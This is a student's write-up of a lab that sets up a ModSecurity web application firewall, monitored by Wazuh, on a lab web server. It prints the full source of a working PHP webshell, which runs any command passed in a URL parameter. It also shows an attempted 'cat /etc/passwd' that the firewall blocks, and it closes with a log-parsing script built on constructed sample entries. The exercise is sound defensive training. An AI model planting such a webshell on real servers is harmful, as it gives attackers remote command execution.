Lab 5.1 Wazuh WAF
Adding software to web01
WAN-to-DMZ
If not already present, add a permanent rule to vyos so that return traffic for connections established from the DMZ to the WAN is allowed back in through the WAN-to-DMZ firewall (a rule matching established/related state, typically rule 1). If that rule is not there, add it.
DMZ-to-WAN
Make a rule to allow all traffic (temporarily) so web01 can reach the package repositories. Both commands are entered in configure mode and need a commit:
set firewall name DMZ-to-WAN default-action accept
set firewall name WAN-to-DMZ default-action accept
Adding mod_security, the core rule set and php to web01
The following commands update the system and install mod_security, the OWASP core rule set (CRS) used by this layer 7 firewall, and the php packages needed to make a webshell run:
sudo yum update
sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
Once mod_security is installed, revert the temporary allow rules (and commit) so both firewalls drop by default again:
set firewall name DMZ-to-WAN default-action drop
set firewall name WAN-to-DMZ default-action drop
Deliverable 1. Restart httpd on web01. Provide two screenshots similar to the ones below that show that the security2_module is loaded.
Restart httpd
sudo systemctl restart httpd
Run the following commands to show that security2_module is loaded
sudo httpd -M | grep security2
This command lists the loaded Apache modules (httpd -M) and filters (grep) the output to show only the modules whose name contains security2. The security2 module is mod_security (ModSecurity), the Apache module that provides web application firewall (WAF) functionality, so sudo httpd -M | grep security2 tells you whether ModSecurity is loaded in your Apache configuration. If nothing is printed, the module is not loaded and the WAF is not active.

cd /etc/httpd
ls
and you should see the mod_security configuration files (on a stock CentOS/RHEL install, conf.d/mod_security.conf and the modsecurity.d directory that holds the core rule set).

You can find the apache (httpd) error log in /var/log/httpd/error_log. To show only the ModSecurity entries, run:
sudo grep ModSecurity /var/log/httpd/error_log

Testing ModSecurity
Deliverable 2. Provide a screenshot showing that you can get to web01 from rw01. Make sure you show you are on rw01 (hostname).
I copied my original index.html to index.txt in the /var/www/html directory just in case I wanted to use it again, but not delete it.

Download a php webshell to /var/www/html/shell.php on web01. The one below is from this website.
You can either manually copy/paste it into a file or use wget to fetch it. If you use the wget method, you will need to re-enable outbound traffic on the firewall (the temporary DMZ-to-WAN accept rule used for the yum install) while you download, and set it back to drop afterwards. Make sure to wget the raw code rather than the HTML page that displays it.

I used the mv command to rename the original file downloaded from the link above to shell.php.

Below is what is in the shell.php file:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
Deliverable 3. Use the php webshell to execute a command like ifconfig, hostname or whoami. Provide a screenshot showing remote code execution like the one below. You may need to be explicit about the path of the program you wish to run, because the web server's environment does not necessarily have the same PATH as your login shell, for example:
/sbin/ifconfig

hostname

whoami

Deliverable 4. Provide a screenshot that shows what happens when you attempt to run the following command within your webshell.
When I run cat /etc/passwd, I get an HTTP error saying I am forbidden to access this resource.

Deliverable 5. Find the error or warning associated with Deliverable 4 in the apache error_log. Provide a screenshot.
sudo grep /etc/passwd /var/log/httpd/error_log

Deliverable 6. Find the same alert in Wazuh and provide a screenshot similar to the one below. You will see two types of events: 404 events taken directly from the Apache logs, but you should see some ModSecurity events as well.

These logs don't say /etc/passwd in them, but I know they are the logs from my failed attempt at catting /etc/passwd, since I did it a bunch of times in a row and many more logs showed up.
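For Deliverables 5 and 6 it helps to know what a ModSecurity entry in error_log looks like and which part of it carries the rule id, the message and the blocked URI. The script below is an added example written for this page; it is not part of the lab or of the ModSecurity project. The log lines inside it are constructed samples in the format ModSecurity 2.x writes under Apache 2.4 with an anomaly-scoring CRS 3 setup: a Warning line from the rule that matched, a separate Access denied line from the blocking rule, and an ordinary 404 for contrast. Host names, addresses, timestamps and unique_id values are made up, and the helpers assume GNU/POSIX grep and sed -E. It defines check_security2_loaded (the httpd -M | grep security2 check from Deliverable 1 as a function), summarize_modsec_denials (one line per blocked request: client, HTTP code, rule id, URI, message) and count_modsec_rule_hits (how often each rule id fired, warnings included). Note that in the sample the Access denied line never mentions /etc/passwd; only the Warning line for the matching rule carries the matched data, so grepping the log for the path finds the warning but not the denial itself.

```shell
#!/bin/sh
# Added example: summarize ModSecurity events from an Apache error_log.
# The log lines below are CONSTRUCTED samples in the ModSecurity 2.x /
# Apache 2.4 format; hosts, addresses, times and unique_ids are made up.

# Deliverable 1 check: exit 0 when Apache lists security2_module
# (run as root or with sudo, as on the page).
check_security2_loaded() {
  httpd -M 2>/dev/null | grep -q 'security2_module'
}

# One line per blocked request, fields separated by '|':
#   client|http_code|rule_id|uri|msg
# Relies on the field order ModSecurity 2 writes:
#   ... [id "..."] ... [msg "..."] ... [uri "..."]
# Warning lines (rule matched but did not block) are deliberately excluded.
summarize_modsec_denials() {
  grep 'ModSecurity: Access denied' |
  sed -nE 's/^.*\[client ([0-9a-fA-F.:]+):[0-9]+\].*Access denied with code ([0-9]+).*\[id "([0-9]+)"\].*\[msg "([^"]*)"\].*\[uri "([^"]*)"\].*$/\1|\2|\3|\5|\4/p'
}

# How often each rule id fired (Warning and Access denied lines both count),
# most frequent first. Output: "<count> <rule_id> <msg>".
count_modsec_rule_hits() {
  grep 'ModSecurity: ' |
  sed -nE 's/^.*\[id "([0-9]+)"\].*\[msg "([^"]*)"\].*$/\1 \2/p' |
  sort | uniq -c | sort -rn
}

# Constructed sample: one blocked "cat /etc/passwd" request to the webshell
# (rule 930120 warns and scores it, 949110 then blocks) followed by an
# unrelated 404 that is not a ModSecurity event at all.
MODSEC_SAMPLE_LOG=$(cat <<'EOF'
[Tue Mar 12 14:05:11.123456 2024] [:error] [pid 2118:tid 139] [client 10.0.5.50:51234] [client 10.0.5.50] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:cmd. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "94"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within ARGS:cmd: cat /etc/passwd"] [severity "CRITICAL"] [tag "attack-lfi"] [hostname "web01"] [uri "/shell.php"] [unique_id "constructed-0001"]
[Tue Mar 12 14:05:11.123789 2024] [:error] [pid 2118:tid 139] [client 10.0.5.50:51234] [client 10.0.5.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "80"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "anomaly-evaluation"] [hostname "web01"] [uri "/shell.php"] [unique_id "constructed-0002"]
[Tue Mar 12 14:06:02.000000 2024] [core:error] [pid 2118:tid 140] [client 10.0.5.50:51240] AH00128: File does not exist: /var/www/html/favicon.ico
EOF
)

# Stand-alone run: summarize the constructed sample. On web01 feed the real
# log instead:  sudo cat /var/log/httpd/error_log | summarize_modsec_denials
printf '%s\n' "$MODSEC_SAMPLE_LOG" | summarize_modsec_denials
printf '%s\n' "$MODSEC_SAMPLE_LOG" | count_modsec_rule_hits
```

On the sample this prints one denial line, 10.0.5.50|403|949110|/shell.php|Inbound Anomaly Score Exceeded (Total Score: 5), and two rule counters (930120 and 949110), while the favicon 404 is ignored. The same pipeline run over the real error_log gives you the client, rule id and URI to look for in Wazuh, which is more reliable than matching on the command string you typed into the webshell.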